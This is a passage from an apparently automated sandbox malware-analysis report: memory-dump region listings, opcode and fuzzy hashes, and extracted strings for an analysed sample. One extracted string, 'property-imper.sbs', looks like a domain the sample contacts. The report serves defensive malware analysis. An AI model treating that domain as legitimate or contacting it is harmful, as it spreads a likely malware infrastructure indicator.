                               • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: Lk$U\$Zb$property-imper.sbs$r
                              • API String ID: 0-2211913898
                              • Opcode ID: b7394492f7291a4f7a00dba9d9453f6caefb8b21cf451c68f881ccfef70e9081
                              • Instruction ID: 569a6d1fef0a7adff33ef13b665b6addfe84f1f747da4ed4a9d215fe3a6a9ab2
                              • Opcode Fuzzy Hash: b7394492f7291a4f7a00dba9d9453f6caefb8b21cf451c68f881ccfef70e9081
                              • Instruction Fuzzy Hash: FAA1DDB010C3D18AD7359F25C4957EFBFE1ABA3308F188A5CD4E95B292DB39410A8B43
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                               • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: )=+4$57$7514$84*6$N
                              • API String ID: 0-4020838272
                              • Opcode ID: be85e90a30f89c364b58cec467ad0dcda84538ec37489d1a8be0575a1ed0ed84
                              • Instruction ID: eaa07a5bdf35bc126ec8cfd0a9942fb7513ee68b059e39264d5cf1c867caff4b
                              • Opcode Fuzzy Hash: be85e90a30f89c364b58cec467ad0dcda84538ec37489d1a8be0575a1ed0ed84
                              • Instruction Fuzzy Hash: 8E71D26110C3C28BD715DB29C4A037BFFE1AFA2305F1C49ADE4D65B292D779890AC752
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                               • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: H{D}$TgXy$_o]a$=>?
                              • API String ID: 0-2004217480
                              • Opcode ID: 34590117c49dba7c7dced0c47a30aa6101860dbbdfa18d475fd9926e3f70a8e6
                              • Instruction ID: 76f1b77b67f5025fb661762cae273b457e8c429180483f4efa043868c3c066fb
                              • Opcode Fuzzy Hash: 34590117c49dba7c7dced0c47a30aa6101860dbbdfa18d475fd9926e3f70a8e6
                              • Instruction Fuzzy Hash: 861214B1110B01CFE3248F26D895B97BBF5FB55314F048A2DD5AA8BAA0DB74B449DF80
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                               • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: =:;8$=:;8$a{$kp
                              • API String ID: 0-2717198472
                              • Opcode ID: 92e328ce4090771fa698d27e7ed520ff69f7464f4bd5c8b2bfff21f3627cac41
                              • Instruction ID: f4ad1618e6fb3b9063e6370e5f4482edfa1d3c871798b249818a1c67020ebbed
                              • Opcode Fuzzy Hash: 92e328ce4090771fa698d27e7ed520ff69f7464f4bd5c8b2bfff21f3627cac41
                              • Instruction Fuzzy Hash: B4E1EFB5508345CFE720DF64D881B6FBBE1FBD9308F14892CE5858B291EB349809DB52
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                               • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: @A$lPLN$svfZ$IK
                              • API String ID: 0-1806543684
                              • Opcode ID: dbfe06cedf83fab0fbce42c6ff6e1899001ab1c0ce5723c305b2b071452d1813
                              • Instruction ID: b9c09a9f16a8b99c8bbfeef57028860c4f2306c0ea7f72c3a39cdb8b16fb3a43
                              • Opcode Fuzzy Hash: dbfe06cedf83fab0fbce42c6ff6e1899001ab1c0ce5723c305b2b071452d1813
                              • Instruction Fuzzy Hash: 92C1067164C3848BE3249E6484A536FBFE6BBC2700F18C92DE8E55B351D7758C09DB92
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                               • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: KpMn$ww$xO_K
                              • API String ID: 0-103575227
                              • Opcode ID: 5dbdf71afb6550ed30a80efaf78b3a032d44c67f9346e8b7c0ee48e1ebbca66e
                              • Instruction ID: 853f388a45756b88b0a40d9ca7a59ef6fe2021326559f6801f4f9d9736967010
                              • Opcode Fuzzy Hash: 5dbdf71afb6550ed30a80efaf78b3a032d44c67f9346e8b7c0ee48e1ebbca66e
                              • Instruction Fuzzy Hash: A1B201F360C2049FE304AE29EC8567AFBE9EFD4720F1A893DE6C483744E63558458697
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                               • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: @J$KP$VD$raZ
                              • API String ID: 0-1355736736
                              • Opcode ID: edd01e8e3ef8385563dedf14324f768332dbad4fc149e42d71af8929c09ba31b
                              • Instruction ID: 8382c25b39451b41c5ab72f9d767740babf921b794e8e275af5ee9498c17ef13
                              • Opcode Fuzzy Hash: edd01e8e3ef8385563dedf14324f768332dbad4fc149e42d71af8929c09ba31b
                              • Instruction Fuzzy Hash: 9C9194B1704B05AFD720CF68CC81BABBBB1FB96310F04452CE1959B781D374A81ADB92
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                               • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: Jj{?$iAlS$ye^s
                              • API String ID: 0-2361411422
                              • Opcode ID: 9799eed29b83ae1ece6d512a10f0fc1043b68ebf7d7705d20b4849b0b234662a
                              • Instruction ID: 77d333d705ae0e6cb199b0c0a6a59421badf35033f0e8c85ad6f59f60c79701f
                              • Opcode Fuzzy Hash: 9799eed29b83ae1ece6d512a10f0fc1043b68ebf7d7705d20b4849b0b234662a
                              • Instruction Fuzzy Hash: E082D6F3608200AFE3046E1DEC4577AFBE9EF94720F1A492DEAC4C3744E63598558697
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                               • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: )$)$IEND
                              • API String ID: 0-588110143
                              • Opcode ID: e1fb58a93657857cb4aebf88d4ac19e7c72dbc13c71abf214e68838e82b9dba2
                              • Instruction ID: d4996601ea21daea93f51411b39a0db991c695ebb7ba4491b991f3281c15229c
                              • Opcode Fuzzy Hash: e1fb58a93657857cb4aebf88d4ac19e7c72dbc13c71abf214e68838e82b9dba2
                              • Instruction Fuzzy Hash: 0BF1D1B1A087029FE314EF28D85572ABBE0FB94314F14492DFD96A7392D774E914CB82
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                               • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: PQ$A_$IG
                              • API String ID: 0-2179527320
                              • Opcode ID: 5a313c18d2309369e4b023ea140994389814106e92c18aa2199aca421912029f
                              • Instruction ID: cc4dc34c7d62676f8c9e9bbdee485addf1f72667cd08f0b0f6d186b1187eb185
                              • Opcode Fuzzy Hash: 5a313c18d2309369e4b023ea140994389814106e92c18aa2199aca421912029f
                              • Instruction Fuzzy Hash: 4A41AD7400C341CAD704DF21D892A6BBBF1FF96758F249A0DE4C29B691E7348646CB5A
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                               • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: cC$jC
                              • API String ID: 0-2055910567
                              • Opcode ID: 170809912b6b861d0f62f43bd7f71cd616314ae9a403523d146632ef5759cd15
                              • Instruction ID: 2437f6e1aba3a588aae6c4e846c4a8bfe9716bc19522dd21c589a38141e89801
                              • Opcode Fuzzy Hash: 170809912b6b861d0f62f43bd7f71cd616314ae9a403523d146632ef5759cd15
                              • Instruction Fuzzy Hash: BC42F036F04615CFCB08CF68D8916AEBBF2FB99314F1A857DC946A7391D634A905CB80
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                               • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: f$
                              • API String ID: 2994545307-508322865
                              • Opcode ID: 79cd2cce5ce67eef70d9f4e4b5f931652fd2158d49570e882781917a22b1b775
                              • Instruction ID: fb78703183ebb89882bdd68289c0dd763c390084af038ee771e8654d14135f9a
                              • Opcode Fuzzy Hash: 79cd2cce5ce67eef70d9f4e4b5f931652fd2158d49570e882781917a22b1b775
                              • Instruction Fuzzy Hash: CA12D0706083419FD714CF29C890AABBFE1FBD5324F248A2CE595973A2D731E846CB56
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 0(~
                              • API String ID: 0-3804341830
                              • Opcode ID: 0f89180d3f85a38aa435bbee8e629195a2f6fc8126ad2c4bd63192cb4adc038e
                              • Instruction ID: 286e065712c54c83f85fe35ef37e7de0ca70887631244cf48e1f6675655d26b4
                              • Opcode Fuzzy Hash: 0f89180d3f85a38aa435bbee8e629195a2f6fc8126ad2c4bd63192cb4adc038e
                              • Instruction Fuzzy Hash: 2FB208F3A0C6049FE304AE2DEC8567AFBE9EB94720F16463DEAC4D3744E63558018697
                              Strings
                              • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 005B25D2
                              • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 005B2591
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                              • API String ID: 0-2492670020
                              • Opcode ID: 765ac4659f7e3d5e29ac3c48c73e2fabaa935534627018d54be8e247c9c2937a
                              • Instruction ID: e29b19289fc440d88dc7237711cf4ee55193cddb216ac7135421e62b050d6221
                              • Opcode Fuzzy Hash: 765ac4659f7e3d5e29ac3c48c73e2fabaa935534627018d54be8e247c9c2937a
                              • Instruction Fuzzy Hash: 80814A32A08A954BCB258E3C8C912E97FA26FA7330F2DC7A9D4719B3D5C6249D058371
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1446448098.00000000005D9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                              • Associated: 00000001.00000002.1446280475.0000000000580000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446385883.0000000000581000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446385883.00000000005C5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446435674.00000000005D7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000083F000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.0000000000867000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446448098.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446673384.000000000087D000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446778105.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1446790800.0000000000A18000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_580000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 5kQ9$5kQ9
                              • API String ID: 0-3798652979
                              • Opcode ID: 8fbe858c43d1c337ec96edc95446db99815b4a36b1035f142678c3a459d93b05
                              • Instruction ID: ceef0eb31128908e0b1eb9e6f88aaca82146cca61daa9c49d616d380cfed763b
